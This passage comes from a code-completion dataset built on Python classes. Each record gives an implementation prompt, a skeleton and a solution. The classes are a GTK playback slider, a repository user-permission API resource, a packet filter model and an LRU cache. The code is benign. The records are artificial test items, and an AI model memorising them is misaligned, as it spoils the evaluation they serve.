Attributes: widget: Widget containing the slider and labels. slider: Slider for seeking. This is public for use in tests only.", "class_name": "PositionSlider", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PositionSlider:\n \"\"\"Position slider, including labels for the current position and duration. Attributes: widget: Widget containing the slider and labels. slider: Slider for seeking. This is public for use in tests only.\"\"\"\n\n def __init__(self, *, pubsub_bus: pubsub.PubSub, player_: player.Player) -> None:\n \"\"\"Initializer. Args: pubsub_bus: PubSub message bus. player_: Player.\"\"\"\n <|body_0|>\n\n def _handle_play_status(self, status: player.PlayStatus) -> None:\n \"\"\"Handler for PlayStatus updates.\"\"\"\n <|body_1|>\n\n def on_slider_change_value(self, slider: Gtk.Scale, scroll: Gtk.ScrollType, value: float) -> bool:\n \"\"\"Handler for the slider's change-value signal.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._pubsub = pubsub_bus\n self._player = player_\n builder = Gtk.Builder.new_from_string(resources.read_text('pepper_music_player.ui', 'player_status_position_slider.glade'), length=-1)\n self.widget = builder.get_object('container')\n alignment.set_direction_recursive(self.widget, Gtk.TextDirection.LTR)\n self._position: Gtk.Label = builder.get_object('position')\n self._duration: Gtk.Label = builder.get_object('duration')\n self.slider: Gtk.Scale = builder.get_object('slider')\n self._pubsub.subscribe(player.PlayStatus, self._handle_play_status, want_last_message=True)\n builder.connect_signals(self)\n<|end_body_0|>\n\n<|body_start_1|>\n alignment.fill_aligned_numerical_label(self._position, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.position))\n alignment.fill_aligned_numerical_label(self._duration, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.duration))\n self.slider.set_range(0.0, status.duration.total_seconds())\n self.slider.set_value(status.position.total_seconds())\n<|end_body_1|>\n\n<|body_start_2|>\n del slider, scroll\n lower = self.slider.get_adjustment().get_lower()\n upper = self.slider.get_adjustment().get_upper()\n self._player.seek(datetime.timedelta(seconds=min(max(value, lower), upper)))\n return False\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000180", "length_bytes": 7252, "license_type": "permissive", "methods": [{"docstring": "Initializer. Args: pubsub_bus: PubSub message bus. player_: Player.", "name": "__init__", "signature": "def __init__(self, *, pubsub_bus: pubsub.PubSub, player_: player.Player) -> None"}, {"docstring": "Handler for PlayStatus updates.", "name": "_handle_play_status", "signature": "def _handle_play_status(self, status: player.PlayStatus) -> None"}, {"docstring": "Handler for the slider's change-value signal.", "name": "on_slider_change_value", "signature": "def on_slider_change_value(self, slider: Gtk.Scale, scroll: Gtk.ScrollType, value: float) -> bool"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005554", "prompt": "Implement the Python class `PositionSlider` described below.\n\nClass description:\nPosition slider, including labels for the current position and duration. Attributes: widget: Widget containing the slider and labels. slider: Slider for seeking. 
This is public for use in tests only.\n\nMethod signatures and docstrings:\n- def __init__(self, *, pubsub_bus: pubsub.PubSub, player_: player.Player) -> None: Initializer. Args: pubsub_bus: PubSub message bus. player_: Player.\n- def _handle_play_status(self, status: player.PlayStatus) -> None: Handler for PlayStatus updates.\n- def on_slider_change_value(self, slider: Gtk.Scale, scroll: Gtk.ScrollType, value: float) -> bool: Handler for the slider's change-value signal.", "prompted_full_text": "Implement the Python class `PositionSlider` described below.\n\nClass description:\nPosition slider, including labels for the current position and duration. Attributes: widget: Widget containing the slider and labels. slider: Slider for seeking. This is public for use in tests only.\n\nMethod signatures and docstrings:\n- def __init__(self, *, pubsub_bus: pubsub.PubSub, player_: player.Player) -> None: Initializer. Args: pubsub_bus: PubSub message bus. player_: Player.\n- def _handle_play_status(self, status: player.PlayStatus) -> None: Handler for PlayStatus updates.\n- def on_slider_change_value(self, slider: Gtk.Scale, scroll: Gtk.ScrollType, value: float) -> bool: Handler for the slider's change-value signal.\n\n<|skeleton|>\nclass PositionSlider:\n \"\"\"Position slider, including labels for the current position and duration. Attributes: widget: Widget containing the slider and labels. slider: Slider for seeking. This is public for use in tests only.\"\"\"\n\n def __init__(self, *, pubsub_bus: pubsub.PubSub, player_: player.Player) -> None:\n \"\"\"Initializer. Args: pubsub_bus: PubSub message bus. player_: Player.\"\"\"\n <|body_0|>\n\n def _handle_play_status(self, status: player.PlayStatus) -> None:\n \"\"\"Handler for PlayStatus updates.\"\"\"\n <|body_1|>\n\n def on_slider_change_value(self, slider: Gtk.Scale, scroll: Gtk.ScrollType, value: float) -> bool:\n \"\"\"Handler for the slider's change-value signal.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._pubsub = pubsub_bus\n self._player = player_\n builder = Gtk.Builder.new_from_string(resources.read_text('pepper_music_player.ui', 'player_status_position_slider.glade'), length=-1)\n self.widget = builder.get_object('container')\n alignment.set_direction_recursive(self.widget, Gtk.TextDirection.LTR)\n self._position: Gtk.Label = builder.get_object('position')\n self._duration: Gtk.Label = builder.get_object('duration')\n self.slider: Gtk.Scale = builder.get_object('slider')\n self._pubsub.subscribe(player.PlayStatus, self._handle_play_status, want_last_message=True)\n builder.connect_signals(self)\n<|end_body_0|>\n\n<|body_start_1|>\n alignment.fill_aligned_numerical_label(self._position, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.position))\n alignment.fill_aligned_numerical_label(self._duration, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.duration))\n self.slider.set_range(0.0, status.duration.total_seconds())\n self.slider.set_value(status.position.total_seconds())\n<|end_body_1|>\n\n<|body_start_2|>\n del slider, scroll\n lower = self.slider.get_adjustment().get_lower()\n upper = self.slider.get_adjustment().get_upper()\n self._player.seek(datetime.timedelta(seconds=min(max(value, lower), upper)))\n return False\n<|end_body_2|>\n", "revision_id": "2a45aef6deb6247c42d63b5f7475ec5517ea9321", "skeleton": "<|skeleton|>\nclass PositionSlider:\n \"\"\"Position slider, including labels for the current position and duration. 
Attributes: widget: Widget containing the slider and labels. slider: Slider for seeking. This is public for use in tests only.\"\"\"\n\n def __init__(self, *, pubsub_bus: pubsub.PubSub, player_: player.Player) -> None:\n \"\"\"Initializer. Args: pubsub_bus: PubSub message bus. player_: Player.\"\"\"\n <|body_0|>\n\n def _handle_play_status(self, status: player.PlayStatus) -> None:\n \"\"\"Handler for PlayStatus updates.\"\"\"\n <|body_1|>\n\n def on_slider_change_value(self, slider: Gtk.Scale, scroll: Gtk.ScrollType, value: float) -> bool:\n \"\"\"Handler for the slider's change-value signal.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PositionSlider:\n \"\"\"Position slider, including labels for the current position and duration. Attributes: widget: Widget containing the slider and labels. slider: Slider for seeking. This is public for use in tests only.\"\"\"\n\n def __init__(self, *, pubsub_bus: pubsub.PubSub, player_: player.Player) -> None:\n \"\"\"Initializer. Args: pubsub_bus: PubSub message bus. player_: Player.\"\"\"\n self._pubsub = pubsub_bus\n self._player = player_\n builder = Gtk.Builder.new_from_string(resources.read_text('pepper_music_player.ui', 'player_status_position_slider.glade'), length=-1)\n self.widget = builder.get_object('container')\n alignment.set_direction_recursive(self.widget, Gtk.TextDirection.LTR)\n self._position: Gtk.Label = builder.get_object('position')\n self._duration: Gtk.Label = builder.get_object('duration')\n self.slider: Gtk.Scale = builder.get_object('slider')\n self._pubsub.subscribe(player.PlayStatus, self._handle_play_status, want_last_message=True)\n builder.connect_signals(self)\n\n def _handle_play_status(self, status: player.PlayStatus) -> None:\n \"\"\"Handler for PlayStatus updates.\"\"\"\n alignment.fill_aligned_numerical_label(self._position, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.position))\n alignment.fill_aligned_numerical_label(self._duration, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.duration))\n self.slider.set_range(0.0, status.duration.total_seconds())\n self.slider.set_value(status.position.total_seconds())\n\n def on_slider_change_value(self, slider: Gtk.Scale, scroll: Gtk.ScrollType, value: float) -> bool:\n \"\"\"Handler for the slider's change-value signal.\"\"\"\n del slider, scroll\n lower = self.slider.get_adjustment().get_lower()\n upper = self.slider.get_adjustment().get_upper()\n self._player.seek(datetime.timedelta(seconds=min(max(value, lower), upper)))\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "pepper_music_player/ui/player_status.py", "source_repo": "EmDBaum/pepper-music-player", "split": "test", "star_events_count": 0} {"blob_id": "4056743ea5fa42f82439e8c8c0ab8eb0d8410d83", "bodies": ["logger.debug('Get repo: %s/%s permissions for user %s', namespace_name, repository_name, username)\nperm = model.get_repo_permission_for_user(username, namespace_name, repository_name)\nreturn perm.to_dict()", "new_permission = request.get_json()\nlogger.debug('Setting permission to: %s for user %s', new_permission['role'], username)\ntry:\n perm = model.set_repo_permission_for_user(username, namespace_name, repository_name, new_permission['role'])\n resp = perm.to_dict()\nexcept SaveException as ex:\n raise request_error(exception=ex)\nlog_action('change_repo_permission', namespace_name, 
{'username': username, 'repo': repository_name, 'namespace': namespace_name, 'role': new_permission['role']}, repo_name=repository_name)\nreturn (resp, 200)", "try:\n model.delete_repo_permission_for_user(username, namespace_name, repository_name)\nexcept DeleteException as ex:\n raise request_error(exception=ex)\nlog_action('delete_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name}, repo_name=repository_name)\nreturn ('', 204)"], "bodies_text": "<|body_start_0|>\n logger.debug('Get repo: %s/%s permissions for user %s', namespace_name, repository_name, username)\n perm = model.get_repo_permission_for_user(username, namespace_name, repository_name)\n return perm.to_dict()\n<|end_body_0|>\n\n<|body_start_1|>\n new_permission = request.get_json()\n logger.debug('Setting permission to: %s for user %s', new_permission['role'], username)\n try:\n perm = model.set_repo_permission_for_user(username, namespace_name, repository_name, new_permission['role'])\n resp = perm.to_dict()\n except SaveException as ex:\n raise request_error(exception=ex)\n log_action('change_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name, 'role': new_permission['role']}, repo_name=repository_name)\n return (resp, 200)\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n model.delete_repo_permission_for_user(username, namespace_name, repository_name)\n except DeleteException as ex:\n raise request_error(exception=ex)\n log_action('delete_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name}, repo_name=repository_name)\n return ('', 204)\n<|end_body_2|>\n", "class_docstring": "Resource for managing individual user permissions.", "class_name": "RepositoryUserPermission", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RepositoryUserPermission:\n \"\"\"Resource for managing individual user permissions.\"\"\"\n\n def get(self, namespace_name, repository_name, username):\n \"\"\"Get the permission for the specified user.\"\"\"\n <|body_0|>\n\n def put(self, namespace_name, repository_name, username):\n \"\"\"Update the permissions for an existing repository.\"\"\"\n <|body_1|>\n\n def delete(self, namespace_name, repository_name, username):\n \"\"\"Delete the permission for the user.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n logger.debug('Get repo: %s/%s permissions for user %s', namespace_name, repository_name, username)\n perm = model.get_repo_permission_for_user(username, namespace_name, repository_name)\n return perm.to_dict()\n<|end_body_0|>\n\n<|body_start_1|>\n new_permission = request.get_json()\n logger.debug('Setting permission to: %s for user %s', new_permission['role'], username)\n try:\n perm = model.set_repo_permission_for_user(username, namespace_name, repository_name, new_permission['role'])\n resp = perm.to_dict()\n except SaveException as ex:\n raise request_error(exception=ex)\n log_action('change_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name, 'role': new_permission['role']}, repo_name=repository_name)\n return (resp, 200)\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n model.delete_repo_permission_for_user(username, namespace_name, repository_name)\n except DeleteException as ex:\n raise request_error(exception=ex)\n log_action('delete_repo_permission', namespace_name, {'username': 
username, 'repo': repository_name, 'namespace': namespace_name}, repo_name=repository_name)\n return ('', 204)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000181", "length_bytes": 8862, "license_type": "permissive", "methods": [{"docstring": "Get the permission for the specified user.", "name": "get", "signature": "def get(self, namespace_name, repository_name, username)"}, {"docstring": "Update the permissions for an existing repository.", "name": "put", "signature": "def put(self, namespace_name, repository_name, username)"}, {"docstring": "Delete the permission for the user.", "name": "delete", "signature": "def delete(self, namespace_name, repository_name, username)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006334", "prompt": "Implement the Python class `RepositoryUserPermission` described below.\n\nClass description:\nResource for managing individual user permissions.\n\nMethod signatures and docstrings:\n- def get(self, namespace_name, repository_name, username): Get the permission for the specified user.\n- def put(self, namespace_name, repository_name, username): Update the permissions for an existing repository.\n- def delete(self, namespace_name, repository_name, username): Delete the permission for the user.", "prompted_full_text": "Implement the Python class `RepositoryUserPermission` described below.\n\nClass description:\nResource for managing individual user permissions.\n\nMethod signatures and docstrings:\n- def get(self, namespace_name, repository_name, username): Get the permission for the specified user.\n- def put(self, namespace_name, repository_name, username): Update the permissions for an existing repository.\n- def delete(self, namespace_name, repository_name, username): Delete the permission for the user.\n\n<|skeleton|>\nclass RepositoryUserPermission:\n \"\"\"Resource for managing individual user permissions.\"\"\"\n\n def get(self, namespace_name, repository_name, username):\n \"\"\"Get the permission for the specified user.\"\"\"\n <|body_0|>\n\n def put(self, namespace_name, repository_name, username):\n \"\"\"Update the permissions for an existing repository.\"\"\"\n <|body_1|>\n\n def delete(self, namespace_name, repository_name, username):\n \"\"\"Delete the permission for the user.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n logger.debug('Get repo: %s/%s permissions for user %s', namespace_name, repository_name, username)\n perm = model.get_repo_permission_for_user(username, namespace_name, repository_name)\n return perm.to_dict()\n<|end_body_0|>\n\n<|body_start_1|>\n new_permission = request.get_json()\n logger.debug('Setting permission to: %s for user %s', new_permission['role'], username)\n try:\n perm = model.set_repo_permission_for_user(username, namespace_name, repository_name, new_permission['role'])\n resp = perm.to_dict()\n except SaveException as ex:\n raise request_error(exception=ex)\n log_action('change_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name, 'role': new_permission['role']}, repo_name=repository_name)\n return (resp, 200)\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n model.delete_repo_permission_for_user(username, namespace_name, repository_name)\n except DeleteException as ex:\n raise request_error(exception=ex)\n log_action('delete_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name}, repo_name=repository_name)\n return ('', 204)\n<|end_body_2|>\n", 
"revision_id": "e400a0c22c5f89dd35d571654b13d262b1f6e3b3", "skeleton": "<|skeleton|>\nclass RepositoryUserPermission:\n \"\"\"Resource for managing individual user permissions.\"\"\"\n\n def get(self, namespace_name, repository_name, username):\n \"\"\"Get the permission for the specified user.\"\"\"\n <|body_0|>\n\n def put(self, namespace_name, repository_name, username):\n \"\"\"Update the permissions for an existing repository.\"\"\"\n <|body_1|>\n\n def delete(self, namespace_name, repository_name, username):\n \"\"\"Delete the permission for the user.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RepositoryUserPermission:\n \"\"\"Resource for managing individual user permissions.\"\"\"\n\n def get(self, namespace_name, repository_name, username):\n \"\"\"Get the permission for the specified user.\"\"\"\n logger.debug('Get repo: %s/%s permissions for user %s', namespace_name, repository_name, username)\n perm = model.get_repo_permission_for_user(username, namespace_name, repository_name)\n return perm.to_dict()\n\n def put(self, namespace_name, repository_name, username):\n \"\"\"Update the permissions for an existing repository.\"\"\"\n new_permission = request.get_json()\n logger.debug('Setting permission to: %s for user %s', new_permission['role'], username)\n try:\n perm = model.set_repo_permission_for_user(username, namespace_name, repository_name, new_permission['role'])\n resp = perm.to_dict()\n except SaveException as ex:\n raise request_error(exception=ex)\n log_action('change_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name, 'role': new_permission['role']}, repo_name=repository_name)\n return (resp, 200)\n\n def delete(self, namespace_name, repository_name, username):\n \"\"\"Delete the permission for the user.\"\"\"\n try:\n model.delete_repo_permission_for_user(username, namespace_name, repository_name)\n except DeleteException as ex:\n raise request_error(exception=ex)\n log_action('delete_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name}, repo_name=repository_name)\n return ('', 204)\n", "source": "the_stack_v2_python_sparse", "source_path": "endpoints/api/permission.py", "source_repo": "quay/quay", "split": "test", "star_events_count": 2363} {"blob_id": "07ec6d159647e67be88be21ce15767639c5a6122", "bodies": ["self.type = None\nself.subsvc = None\nself.submsg = None", "self.type = type\nself.subsvc = subsvc\nself.submsg = submsg", "if self.type == '' and self.subsvc == 0 and (self.submsg == 0):\n return None\nfiltr = {'type': self.type, 'svc': self.subsvc, 'msg': self.submsg}\nprint(filtr)\nreturn filtr"], "bodies_text": "<|body_start_0|>\n self.type = None\n self.subsvc = None\n self.submsg = None\n<|end_body_0|>\n\n<|body_start_1|>\n self.type = type\n self.subsvc = subsvc\n self.submsg = submsg\n<|end_body_1|>\n\n<|body_start_2|>\n if self.type == '' and self.subsvc == 0 and (self.submsg == 0):\n return None\n filtr = {'type': self.type, 'svc': self.subsvc, 'msg': self.submsg}\n print(filtr)\n return filtr\n<|end_body_2|>\n", "class_docstring": "This class represents the model of a Filter view. 
It defines the type of the packets to be shown, the subservice id and the submessage id", "class_name": "FilterModel", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FilterModel:\n \"\"\"This class represents the model of a Filter view. It defines the type of the packets to be shown, the subservice id and the submessage id\"\"\"\n\n def __init__(self):\n \"\"\"This is the constructor of the class\"\"\"\n <|body_0|>\n\n def set_filter_options(self, type: str, subsvc: int, submsg: int):\n \"\"\"This method sets all the parameters :param type: The packet type :param subsvc: The packet subservice :param submsg: The packet submessage\"\"\"\n <|body_1|>\n\n def get_filter_options(self):\n \"\"\"This method gets all the parameters of the filter :return: A dictionary with all the parameters of the filter\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.type = None\n self.subsvc = None\n self.submsg = None\n<|end_body_0|>\n\n<|body_start_1|>\n self.type = type\n self.subsvc = subsvc\n self.submsg = submsg\n<|end_body_1|>\n\n<|body_start_2|>\n if self.type == '' and self.subsvc == 0 and (self.submsg == 0):\n return None\n filtr = {'type': self.type, 'svc': self.subsvc, 'msg': self.submsg}\n print(filtr)\n return filtr\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000182", "length_bytes": 1116, "license_type": "no_license", "methods": [{"docstring": "This is the constructor of the class", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "This method sets all the parameters :param type: The packet type :param subsvc: The packet subservice :param submsg: The packet submessage", "name": "set_filter_options", "signature": "def set_filter_options(self, type: str, subsvc: int, submsg: int)"}, {"docstring": "This method gets all the parameters of the filter :return: A dictionary with all the parameters of the filter", "name": "get_filter_options", "signature": "def get_filter_options(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007204", "prompt": "Implement the Python class `FilterModel` described below.\n\nClass description:\nThis class represents the model of a Filter view. It defines the type of the packets to be shown, the subservice id and the submessage id\n\nMethod signatures and docstrings:\n- def __init__(self): This is the constructor of the class\n- def set_filter_options(self, type: str, subsvc: int, submsg: int): This method sets all the parameters :param type: The packet type :param subsvc: The packet subservice :param submsg: The packet submessage\n- def get_filter_options(self): This method gets all the parameters of the filter :return: A dictionary with all the parameters of the filter", "prompted_full_text": "Implement the Python class `FilterModel` described below.\n\nClass description:\nThis class represents the model of a Filter view. 
It defines the type of the packets to be shown, the subservice id and the submessage id\n\nMethod signatures and docstrings:\n- def __init__(self): This is the constructor of the class\n- def set_filter_options(self, type: str, subsvc: int, submsg: int): This method sets all the parameters :param type: The packet type :param subsvc: The packet subservice :param submsg: The packet submessage\n- def get_filter_options(self): This method gets all the parameters of the filter :return: A dictionary with all the parameters of the filter\n\n<|skeleton|>\nclass FilterModel:\n \"\"\"This class represents the model of a Filter view. It defines the type of the packets to be shown, the subservice id and the submessage id\"\"\"\n\n def __init__(self):\n \"\"\"This is the constructor of the class\"\"\"\n <|body_0|>\n\n def set_filter_options(self, type: str, subsvc: int, submsg: int):\n \"\"\"This method sets all the parameters :param type: The packet type :param subsvc: The packet subservice :param submsg: The packet submessage\"\"\"\n <|body_1|>\n\n def get_filter_options(self):\n \"\"\"This method gets all the parameters of the filter :return: A dictionary with all the parameters of the filter\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.type = None\n self.subsvc = None\n self.submsg = None\n<|end_body_0|>\n\n<|body_start_1|>\n self.type = type\n self.subsvc = subsvc\n self.submsg = submsg\n<|end_body_1|>\n\n<|body_start_2|>\n if self.type == '' and self.subsvc == 0 and (self.submsg == 0):\n return None\n filtr = {'type': self.type, 'svc': self.subsvc, 'msg': self.submsg}\n print(filtr)\n return filtr\n<|end_body_2|>\n", "revision_id": "9ac0538ae38d48149db9ce52a3112515e8ff1bb5", "skeleton": "<|skeleton|>\nclass FilterModel:\n \"\"\"This class represents the model of a Filter view. It defines the type of the packets to be shown, the subservice id and the submessage id\"\"\"\n\n def __init__(self):\n \"\"\"This is the constructor of the class\"\"\"\n <|body_0|>\n\n def set_filter_options(self, type: str, subsvc: int, submsg: int):\n \"\"\"This method sets all the parameters :param type: The packet type :param subsvc: The packet subservice :param submsg: The packet submessage\"\"\"\n <|body_1|>\n\n def get_filter_options(self):\n \"\"\"This method gets all the parameters of the filter :return: A dictionary with all the parameters of the filter\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FilterModel:\n \"\"\"This class represents the model of a Filter view. 
It defines the type of the packets to be shown, the subservice id and the submessage id\"\"\"\n\n def __init__(self):\n \"\"\"This is the constructor of the class\"\"\"\n self.type = None\n self.subsvc = None\n self.submsg = None\n\n def set_filter_options(self, type: str, subsvc: int, submsg: int):\n \"\"\"This method sets all the parameters :param type: The packet type :param subsvc: The packet subservice :param submsg: The packet submessage\"\"\"\n self.type = type\n self.subsvc = subsvc\n self.submsg = submsg\n\n def get_filter_options(self):\n \"\"\"This method gets all the parameters of the filter :return: A dictionary with all the parameters of the filter\"\"\"\n if self.type == '' and self.subsvc == 0 and (self.submsg == 0):\n return None\n filtr = {'type': self.type, 'svc': self.subsvc, 'msg': self.submsg}\n print(filtr)\n return filtr\n", "source": "the_stack_v2_python_sparse", "source_path": "app/Model/FilterModel.py", "source_repo": "ESROCOS/tools-pusconsole", "split": "test", "star_events_count": 0} {"blob_id": "cdcef1ae782e52f73075323746554944e8b32cb2", "bodies": ["self.__size = size\nself.__cache = OrderedDict()\nself.__label = label", "try:\n value = self.__cache.pop(key)\n self.__cache[key] = value\n return value\nexcept KeyError:\n return None", "try:\n try:\n self.__cache.pop(key)\n except KeyError:\n if len(self.__cache) >= self.__size:\n self.__cache.popitem(last=False)\n self.__cache[key] = value\n return True\nexcept Exception as e:\n logger.exception('Failing for %s with %s', self.__label, str(e))\nreturn False"], "bodies_text": "<|body_start_0|>\n self.__size = size\n self.__cache = OrderedDict()\n self.__label = label\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n value = self.__cache.pop(key)\n self.__cache[key] = value\n return value\n except KeyError:\n return None\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n try:\n self.__cache.pop(key)\n except KeyError:\n if len(self.__cache) >= self.__size:\n self.__cache.popitem(last=False)\n self.__cache[key] = value\n return True\n except Exception as e:\n logger.exception('Failing for %s with %s', self.__label, str(e))\n return False\n<|end_body_2|>\n", "class_docstring": "LRU style cache.", "class_name": "CacheUtils", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CacheUtils:\n \"\"\"LRU style cache.\"\"\"\n\n def __init__(self, size=10, label='cache'):\n \"\"\"LRU style cache Args: size (int, optional): maximum number of elements in the cache. Defaults to 10. label (str, optional): A label an instance of the cache. Defaults to \"cache\".\"\"\"\n <|body_0|>\n\n def get(self, key):\n \"\"\"Return the cached value associated with the input key. The key:value combination are moved to top of the cache. Args: key (hashable): identifier for cached object Returns: (any): Cached object associated with the input key or None\"\"\"\n <|body_1|>\n\n def set(self, key, value):\n \"\"\"Store the input value in the cache. The cache contents of the cache are adjusted if the size limit is exceeded. 
Args: key (hashable): identifier for cached object value (any): value to be cached Returns: bool: True for success or false otherwise\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.__size = size\n self.__cache = OrderedDict()\n self.__label = label\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n value = self.__cache.pop(key)\n self.__cache[key] = value\n return value\n except KeyError:\n return None\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n try:\n self.__cache.pop(key)\n except KeyError:\n if len(self.__cache) >= self.__size:\n self.__cache.popitem(last=False)\n self.__cache[key] = value\n return True\n except Exception as e:\n logger.exception('Failing for %s with %s', self.__label, str(e))\n return False\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000183", "length_bytes": 1828, "license_type": "permissive", "methods": [{"docstring": "LRU style cache Args: size (int, optional): maximum number of elements in the cache. Defaults to 10. label (str, optional): A label an instance of the cache. Defaults to \"cache\".", "name": "__init__", "signature": "def __init__(self, size=10, label='cache')"}, {"docstring": "Return the cached value associated with the input key. The key:value combination are moved to top of the cache. Args: key (hashable): identifier for cached object Returns: (any): Cached object associated with the input key or None", "name": "get", "signature": "def get(self, key)"}, {"docstring": "Store the input value in the cache. The cache contents of the cache are adjusted if the size limit is exceeded. Args: key (hashable): identifier for cached object value (any): value to be cached Returns: bool: True for success or false otherwise", "name": "set", "signature": "def set(self, key, value)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006553", "prompt": "Implement the Python class `CacheUtils` described below.\n\nClass description:\nLRU style cache.\n\nMethod signatures and docstrings:\n- def __init__(self, size=10, label='cache'): LRU style cache Args: size (int, optional): maximum number of elements in the cache. Defaults to 10. label (str, optional): A label an instance of the cache. Defaults to \"cache\".\n- def get(self, key): Return the cached value associated with the input key. The key:value combination are moved to top of the cache. Args: key (hashable): identifier for cached object Returns: (any): Cached object associated with the input key or None\n- def set(self, key, value): Store the input value in the cache. The cache contents of the cache are adjusted if the size limit is exceeded. Args: key (hashable): identifier for cached object value (any): value to be cached Returns: bool: True for success or false otherwise", "prompted_full_text": "Implement the Python class `CacheUtils` described below.\n\nClass description:\nLRU style cache.\n\nMethod signatures and docstrings:\n- def __init__(self, size=10, label='cache'): LRU style cache Args: size (int, optional): maximum number of elements in the cache. Defaults to 10. label (str, optional): A label an instance of the cache. Defaults to \"cache\".\n- def get(self, key): Return the cached value associated with the input key. The key:value combination are moved to top of the cache. Args: key (hashable): identifier for cached object Returns: (any): Cached object associated with the input key or None\n- def set(self, key, value): Store the input value in the cache. The cache contents of the cache are adjusted if the size limit is exceeded. 
Args: key (hashable): identifier for cached object value (any): value to be cached Returns: bool: True for success or false otherwise\n\n<|skeleton|>\nclass CacheUtils:\n \"\"\"LRU style cache.\"\"\"\n\n def __init__(self, size=10, label='cache'):\n \"\"\"LRU style cache Args: size (int, optional): maximum number of elements in the cache. Defaults to 10. label (str, optional): A label an instance of the cache. Defaults to \"cache\".\"\"\"\n <|body_0|>\n\n def get(self, key):\n \"\"\"Return the cached value associated with the input key. The key:value combination are moved to top of the cache. Args: key (hashable): identifier for cached object Returns: (any): Cached object associated with the input key or None\"\"\"\n <|body_1|>\n\n def set(self, key, value):\n \"\"\"Store the input value in the cache. The cache contents of the cache are adjusted if the size limit is exceeded. Args: key (hashable): identifier for cached object value (any): value to be cached Returns: bool: True for success or false otherwise\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.__size = size\n self.__cache = OrderedDict()\n self.__label = label\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n value = self.__cache.pop(key)\n self.__cache[key] = value\n return value\n except KeyError:\n return None\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n try:\n self.__cache.pop(key)\n except KeyError:\n if len(self.__cache) >= self.__size:\n self.__cache.popitem(last=False)\n self.__cache[key] = value\n return True\n except Exception as e:\n logger.exception('Failing for %s with %s', self.__label, str(e))\n return False\n<|end_body_2|>\n", "revision_id": "02178b2e04eb80e21caaa1c596d904af91b8e502", "skeleton": "<|skeleton|>\nclass CacheUtils:\n \"\"\"LRU style cache.\"\"\"\n\n def __init__(self, size=10, label='cache'):\n \"\"\"LRU style cache Args: size (int, optional): maximum number of elements in the cache. Defaults to 10. label (str, optional): A label an instance of the cache. Defaults to \"cache\".\"\"\"\n <|body_0|>\n\n def get(self, key):\n \"\"\"Return the cached value associated with the input key. The key:value combination are moved to top of the cache. Args: key (hashable): identifier for cached object Returns: (any): Cached object associated with the input key or None\"\"\"\n <|body_1|>\n\n def set(self, key, value):\n \"\"\"Store the input value in the cache. The cache contents of the cache are adjusted if the size limit is exceeded. Args: key (hashable): identifier for cached object value (any): value to be cached Returns: bool: True for success or false otherwise\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CacheUtils:\n \"\"\"LRU style cache.\"\"\"\n\n def __init__(self, size=10, label='cache'):\n \"\"\"LRU style cache Args: size (int, optional): maximum number of elements in the cache. Defaults to 10. label (str, optional): A label an instance of the cache. Defaults to 